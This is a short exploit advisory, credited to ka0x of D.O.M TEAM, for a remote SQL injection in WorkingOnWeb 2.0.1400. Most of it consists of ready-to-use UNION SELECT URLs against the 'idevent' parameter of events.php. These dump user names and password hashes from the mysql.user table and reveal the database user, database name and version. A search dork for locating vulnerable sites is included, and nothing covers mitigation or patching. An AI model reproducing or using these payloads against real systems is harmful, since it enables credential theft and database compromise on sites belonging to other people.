WorkingOnWeb 2.0.1400 Remote SQL Injection d0rk: Powered by WorkingOnWeb 2.0.1400 bug found by ka0x - D.O.M TEAM contact: ka0x01[!]gmail.com we: ka0x, an0de, xarnuz, s0cratex, Hendrix #from spain 1: vulnerability in line 4. user and password from mysql.user : http://localhost/events.php?idevent=-1/**/union/**/select/**/concat(user,0x203a3a20,password),null,0,0,0,0,0,0,0/**/from/**/mysql.user/* Information: http://localhost/events.php?idevent=-1/**/union/**/select/**/user(),2,3,4,1,1,1,1,1/* http://localhost/events.php?idevent=-1/**/union/**/select/**/database(),2,3,4,1,1,1,1,1/* http://localhost/events.php?idevent=-1/**/union/**/select/**/version(),2,3,4,1,1,1,1,1/* -- // ka0x